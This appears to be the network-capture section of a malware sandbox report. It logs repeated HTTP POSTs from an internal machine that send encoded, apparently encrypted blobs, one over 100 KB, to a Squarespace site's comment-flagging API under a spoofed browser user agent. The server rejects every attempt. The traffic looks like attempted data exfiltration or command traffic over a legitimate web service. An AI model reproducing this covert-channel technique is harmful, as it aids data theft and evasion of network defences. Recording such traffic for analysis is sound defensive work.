Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:57:09 UTC	296	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108324 Expect: 100-continue
2024-09-01 19:57:09 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:57:09 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:57:09 UTC	16306	OUT	Data Raw: 3d 6e 55 61 46 59 5a 59 4f 2f 51 62 42 4d 70 25 32 42 71 73 50 4d 44 4f 43 31 72 56 48 6d 43 74 36 70 6c 57 73 65 37 33 72 65 51 25 32 42 6a 6a 39 46 48 79 75 62 25 32 42 76 58 39 66 4c 33 64 65 79 56 63 52 72 6f 57 4a 30 32 6c 56 6d 62 4d 51 51 72 30 35 55 7a 79 78 70 53 41 62 72 6a 4a 43 30 5a 77 6f 73 75 6d 71 67 76 78 47 42 39 55 59 31 39 66 43 64 46 5a 6f 77 2f 75 48 62 62 58 32 52 25 32 42 74 34 69 59 6d 49 6d 75 48 38 67 79 74 34 4f 57 34 49 61 4d 4b 48 76 54 4c 33 30 71 61 53 54 64 37 6c 57 57 6f 71 30 75 37 2f 4a 4e 67 4c 44 47 38 70 25 32 42 65 53 35 55 71 4a 71 37 44 61 54 59 42 73 30 59 4b 52 43 4b 62 78 4d 77 6c 68 75 68 6d 33 56 6e 74 34 79 47 50 74 6a 6c 34 4a 59 44 6f 71 56 37 42 64 51 70 67 45 39 6e 64 77 52 57 25 32 42 44 55 51 77 68 6c Data Ascii: =nUaFYZYO/QbBMp%2BqsPMDOC1rVHmCt6plWse73reQ%2Bjj9FHyub%2BvX9fL3deyVcRroWJ02lVmbMQQr05UzyxpSAbrjJC0ZwosumqgvxGB9UY19fCdFZow/uHbbX2R%2Bt4iYmImuH8gyt4OW4IaMKHvTL30qaSTd7lWWoq0u7/JNgLDG8p%2BeS5UqJq7DaTYBs0YKRCKbxMwlhuhm3Vnt4yGPtjl4JYDoqV7BdQpgE9ndwRW%2BDUQwhl
2024-09-01 19:57:09 UTC	1	OUT	Data Raw: 48 Data Ascii: H
2024-09-01 19:57:09 UTC	16306	OUT	Data Raw: 4a 38 75 54 45 6a 69 35 6e 68 57 45 58 4f 54 4e 74 68 66 67 55 6a 66 42 7a 57 4a 25 32 42 4a 2f 41 32 32 4a 5a 6a 45 53 69 6d 46 65 56 46 4b 54 6b 47 30 34 53 63 67 71 75 31 38 52 77 34 48 56 6a 52 61 52 46 48 70 43 75 4a 33 69 33 45 7a 51 36 42 41 46 50 64 69 62 6c 74 4a 58 4d 64 58 43 62 52 65 63 75 4f 78 6e 6e 67 68 71 70 58 67 47 46 51 49 4c 72 52 78 6c 6b 41 69 43 33 57 7a 36 45 4f 4a 45 35 79 34 71 33 77 4c 53 51 69 35 31 78 75 53 51 59 66 68 41 6e 48 5a 4a 52 45 47 54 41 69 55 47 6b 35 47 78 70 50 41 55 4a 7a 7a 39 71 47 32 66 4c 6b 50 65 62 59 4b 43 47 41 64 42 43 56 25 32 42 2f 35 5a 66 54 67 5a 77 34 30 51 36 4a 2f 4e 56 68 4f 6d 4a 46 42 70 4f 52 73 61 54 77 46 43 6e 6f 78 57 68 61 34 49 4a 4e 6f 2f 64 53 38 54 77 63 36 35 46 6a 54 63 6f 42 70 Data Ascii: J8uTEji5nhWEXOTNthfgUjfBzWJ%2BJ/A22JZjESimFeVFKTkG04Scgqu18Rw4HVjRaRFHpCuJ3i3EzQ6BAFPdibltJXMdXCbRecuOxnnghqpXgGFQILrRxlkAiC3Wz6EOJE5y4q3wLSQi51xuSQYfhAnHZJREGTAiUGk5GxpPAUJzz9qG2fLkPebYKCGAdBCV%2B/5ZfTgZw40Q6J/NVhOmJFBpORsaTwFCnoxWha4IJNo/dS8Twc65FjTcoBp
2024-09-01 19:57:09 UTC	1	OUT	Data Raw: 6c Data Ascii: l
2024-09-01 19:57:09 UTC	16306	OUT	Data Raw: 61 62 61 61 53 50 32 53 67 4e 2f 33 34 5a 33 39 56 42 5a 52 4c 4d 37 4f 6d 32 25 32 42 71 79 73 36 63 67 44 51 72 74 55 38 67 78 32 7a 53 51 4d 77 72 4c 30 37 71 35 62 57 54 4c 43 2f 61 7a 50 4a 5a 4c 76 6b 6a 49 58 74 66 32 71 44 43 79 32 55 59 4c 44 72 4e 77 6e 6f 52 32 37 68 43 72 74 35 61 31 6f 34 71 4e 31 6d 55 35 71 51 74 6b 52 31 41 43 56 46 59 64 6b 76 50 35 5a 38 63 65 50 44 35 46 53 35 51 39 25 32 42 44 6e 65 73 6d 45 4d 78 39 74 4d 42 41 63 67 53 47 53 45 25 32 42 6c 2f 74 67 4c 67 69 53 25 32 42 32 56 67 53 51 4d 5a 38 70 63 71 42 44 66 6b 53 4b 50 61 6e 72 39 4c 48 46 33 41 48 35 31 62 7a 77 73 48 67 78 4a 63 47 62 6f 34 4e 6d 35 78 59 4e 76 49 42 38 4a 43 59 45 48 70 55 77 7a 63 73 74 65 76 4a 2f 37 4d 79 2f 49 67 70 63 67 5a 39 63 6c 56 31 Data Ascii: abaaSP2SgN/34Z39VBZRLM7Om2%2Bqys6cgDQrtU8gx2zSQMwrL07q5bWTLC/azPJZLvkjIXtf2qDCy2UYLDrNwnoR27hCrt5a1o4qN1mU5qQtkR1ACVFYdkvP5Z8cePD5FS5Q9%2BDnesmEMx9tMBAcgSGSE%2Bl/tgLgiS%2B2VgSQMZ8pcqBDfkSKPanr9LHF3AH51bzwsHgxJcGbo4Nm5xYNvIB8JCYEHpUwzcstevJ/7My/IgpcgZ9clV1
2024-09-01 19:57:09 UTC	1	OUT	Data Raw: 39 Data Ascii: 9
2024-09-01 19:57:09 UTC	16306	OUT	Data Raw: 50 41 79 56 6e 73 58 67 45 47 6e 38 74 59 6a 32 68 4b 59 68 77 69 46 39 34 6c 38 69 2f 6d 6e 68 44 39 37 37 74 42 63 74 51 52 6e 45 44 52 43 56 75 77 6c 38 73 6f 7a 4c 54 4a 6a 4a 61 37 37 50 47 6c 4f 79 5a 70 4c 2f 6e 35 4a 63 6b 6f 44 25 32 42 71 51 45 61 45 7a 49 43 77 31 4e 37 7a 4c 34 6b 4c 34 70 64 6d 63 66 45 69 51 6e 61 57 32 4c 4e 67 55 73 78 31 67 2f 79 4c 66 2f 5a 47 39 39 37 6a 5a 57 50 36 44 69 54 56 50 44 44 31 38 4d 79 46 34 42 6d 58 67 35 65 37 41 6e 4f 4e 58 6f 25 32 42 54 77 49 58 4a 43 6a 6b 50 73 63 53 25 32 42 50 49 59 67 4f 37 44 34 5a 55 30 39 47 44 52 4f 76 47 53 53 76 4f 65 79 49 55 34 36 70 57 72 67 66 76 37 6c 57 72 4c 66 32 57 58 74 38 46 63 6a 5a 6d 6c 63 39 4e 61 6b 35 5a 41 70 4c 58 4c 4d 7a 74 39 6b 73 4a 44 4e 77 67 7a 37 Data Ascii: PAyVnsXgEGn8tYj2hKYhwiF94l8i/mnhD977tBctQRnEDRCVuwl8sozLTJjJa77PGlOyZpL/n5JckoD%2BqQEaEzICw1N7zL4kL4pdmcfEiQnaW2LNgUsx1g/yLf/ZG997jZWP6DiTVPDD18MyF4BmXg5e7AnONXo%2BTwIXJCjkPscS%2BPIYgO7D4ZU09GDROvGSSvOeyIU46pWrgfv7lWrLf2WXt8FcjZmlc9Nak5ZApLXLMzt9ksJDNwgz7
2024-09-01 19:57:09 UTC	1	OUT	Data Raw: 64 Data Ascii: d
2024-09-01 19:57:09 UTC	16306	OUT	Data Raw: 55 50 47 31 59 6c 6d 66 42 4b 46 52 32 64 57 50 63 32 4a 44 77 4c 4d 41 38 36 30 66 58 65 48 55 64 43 30 52 4b 50 41 54 47 55 6f 70 58 42 7a 59 53 4b 55 33 45 50 32 62 76 43 79 41 45 75 77 61 50 55 69 71 6e 62 61 6d 31 62 78 45 69 50 4a 70 53 57 47 33 71 78 57 32 58 77 71 43 4f 6e 25 32 42 52 6b 77 77 57 6f 66 36 34 6e 37 54 45 38 75 41 6b 4e 6d 47 44 59 39 59 42 4d 4c 44 6f 4e 71 48 32 36 50 39 4a 6b 6c 48 47 51 59 57 44 42 53 74 4d 63 4d 32 52 63 33 55 65 41 78 4f 75 42 32 32 71 52 65 65 6e 66 25 32 42 42 4c 73 59 61 4a 52 53 58 51 6c 66 52 4f 25 32 42 4e 55 6d 4c 41 54 78 34 6a 4c 37 63 4b 78 46 33 7a 4b 53 52 43 58 61 46 78 74 6e 4f 78 70 4a 50 78 61 25 32 42 78 4f 34 52 52 53 45 4b 64 6a 55 6e 54 52 35 25 32 42 35 32 64 4e 39 4c 53 47 37 43 68 67 51 Data Ascii: UPG1YlmfBKFR2dWPc2JDwLMA860fXeHUdC0RKPATGUopXBzYSKU3EP2bvCyAEuwaPUiqnbam1bxEiPJpSWG3qxW2XwqCOn%2BRkwwWof64n7TE8uAkNmGDY9YBMLDoNqH26P9JklHGQYWDBStMcM2Rc3UeAxOuB22qReenf%2BBLsYaJRSXQlfRO%2BNUmLATx4jL7cKxF3zKSRCXaFxtnOxpJPxa%2BxO4RRSEKdjUnTR5%2B52dN9LSG7ChgQ
2024-09-01 19:57:09 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:57:09 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BQ3Eqon0NzrMNzdlNDc5ZjdiYjVhYzcyN2MyOGVmZDQyYjQ3OGU3; Path=/; Secure Set-Cookie: crumb=BSXmcA40imF8YWYzYzFmOTc4NDA4NTBlYjRlNzg5YzA5ZTE1OWVk; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: RKtlnmx3/udQXNUWs Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BSXmcA40imF8YWYzYzFmOTc4NDA4NTBlYjRlNzg5YzA5ZTE1OWVk"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
139	192.168.2.4	49905	198.185.159.177	443

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:57:09 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:57:10 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:57:10 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:57:10 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:57:10 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:57:09 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BdDts1FhtY1JMGM3ZjIwYTU0ZmQyNzU2ZWQxMTM2M2I5MjY3ZWNk; Path=/; Secure Set-Cookie: crumb=BVu1IKrp_3UyOTg3OTg5MjllYzg2Mjc5MDUxYTUzNjgyMTE3Y2U0; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: VmGREtq9/m2Jeo5f0 Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BVu1IKrp_3UyOTg3OTg5MjllYzg2Mjc5MDUxYTUzNjgyMTE3Y2U0"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.4	49906	198.185.159.177	443

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:57:10 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:57:10 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:57:10 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:57:10 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:57:10 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:57:10 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BZaD3Ml83cP_NzY2MDI2ZGQ5NTU2ZTBkOTkwNjBlMDk2OTc5Y2Rm; Path=/; Secure Set-Cookie: crumb=BdWnZC2BL3HmMzUwNDJkOGM1NjMxODY3NzA4ZjJlMDhkMjFkM2Y0; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 8OwxwDWE/V24gVjAs Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BdWnZC2BL3HmMzUwNDJkOGM1NjMxODY3NzA4ZjJlMDhkMjFkM2Y0"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
141	192.168.2.4	49907	198.185.159.177	443

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:57:10 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:57:10 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:57:10 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:57:10 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:57:10 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:57:10 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Bdk0PWICT6_YMTdiM2EwM2E0YjZjMWI5YzUzYjU0OTQ3NmVkOTQ2; Path=/; Secure Set-Cookie: crumb=Bd_HWkWOv3_-NzZiM2RjOTA0Njc4NWZhNjQxMTlkODNiYThlZWZm; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: vsqkSoIM/LuhuwvQy Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"Bd_HWkWOv3_-NzZiM2RjOTA0Njc4NWZhNjQxMTlkODNiYThlZWZm"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
142	192.168.2.4	49908	198.185.159.177	443

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:57:11 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:57:11 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:57:11 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:57:11 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:57:11 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:57:11 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BcWSkgmuHEQbZGJlN2RlMGFjYzRkMDg0N2YxODVjZWIwNzdkOTUz; Path=/; Secure Set-Cookie: crumb=BfmPWBjTZUDwOTI2MjQ2OTZiMThiNGQ3ODliOGMzOGQ1ODVkMmIy; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: aCIJWTpp/C6c41zQS Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BfmPWBjTZUDwOTI2MjQ2OTZiMThiNGQ3ODliOGMzOGQ1ODVkMmIy"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
143	192.168.2.4	49909	198.185.159.177	443

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:57:11 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 322 Expect: 100-continue
2024-09-01 19:57:11 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:57:11 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:57:11 UTC	321	OUT	Data Raw: 3d 66 4c 74 30 72 76 63 61 63 36 34 25 32 42 45 48 38 71 74 46 37 73 59 45 33 62 79 6b 47 48 39 58 25 32 42 7a 78 63 35 4b 38 35 54 4c 75 7a 54 62 6d 6e 38 66 75 34 31 70 34 2f 6d 53 6f 44 4b 76 6b 66 5a 31 50 52 7a 48 6e 43 31 4a 70 35 6e 45 59 67 74 73 4e 77 6a 68 4d 61 71 4a 37 35 75 4a 46 44 67 6a 52 44 77 70 58 79 53 6a 4b 32 52 30 6d 54 37 50 52 75 6d 62 37 4a 49 77 6d 6f 45 6b 68 47 37 37 2f 42 6f 65 30 4f 5a 72 62 4b 6a 78 36 66 62 68 66 34 77 32 39 32 5a 73 79 37 64 35 56 72 52 62 6c 38 58 31 39 75 4e 38 73 6a 6d 32 73 32 68 31 72 39 4c 45 54 5a 45 47 2f 4d 6f 72 42 56 4e 33 33 67 31 53 51 4b 45 5a 72 44 72 36 45 35 55 41 46 67 30 65 53 5a 59 46 7a 7a 77 65 70 64 57 68 74 39 45 51 47 6c 6c 69 6f 6f 56 6d 41 6b 72 6c 25 32 42 2f 48 77 69 33 36 68 Data Ascii: =fLt0rvcac64%2BEH8qtF7sYE3bykGH9X%2Bzxc5K85TLuzTbmn8fu41p4/mSoDKvkfZ1PRzHnC1Jp5nEYgtsNwjhMaqJ75uJFDgjRDwpXySjK2R0mT7PRumb7JIwmoEkhG77/Boe0OZrbKjx6fbhf4w292Zsy7d5VrRbl8X19uN8sjm2s2h1r9LETZEG/MorBVN33g1SQKEZrDr6E5UAFg0eSZYFzzwepdWht9EQGlliooVmAkrl%2B/Hwi36h
2024-09-01 19:57:11 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:57:11 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Bag_Rehibhm7ZjY1ODM3ZDk4OTllZDgxNDQ4NDlhMjM1NDgyZTdm; Path=/; Secure Set-Cookie: crumb=Beg1h6DWB_mcM2I3Zjg1NDA2OWJkOGQ3YzYyNDBiNTUzYzFhMzkx; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: CUDy4zdh/Rmy1kdmk Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"Beg1h6DWB_mcM2I3Zjg1NDA2OWJkOGQ3YzYyNDBiNTUzYzFhMzkx"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
144	192.168.2.4	49910	198.185.159.177	443

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:57:11 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:57:12 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:57:12 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:57:12 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:57:12 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:57:11 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BQuy8EaeRDTAODA3MWNhNWJjMDYxNDJlOWIxMTgxMmRmNDhmZGU1; Path=/; Secure Set-Cookie: crumb=Bb3F7gzEy9c7Mjk1NzRiZTE0MmJlOTM1NGYwOGE5YzEyYjVjOTdi; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: d5nfGUdK/T4aYxH3T Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"Bb3F7gzEy9c7Mjk1NzRiZTE0MmJlOTM1NGYwOGE5YzEyYjVjOTdi"}

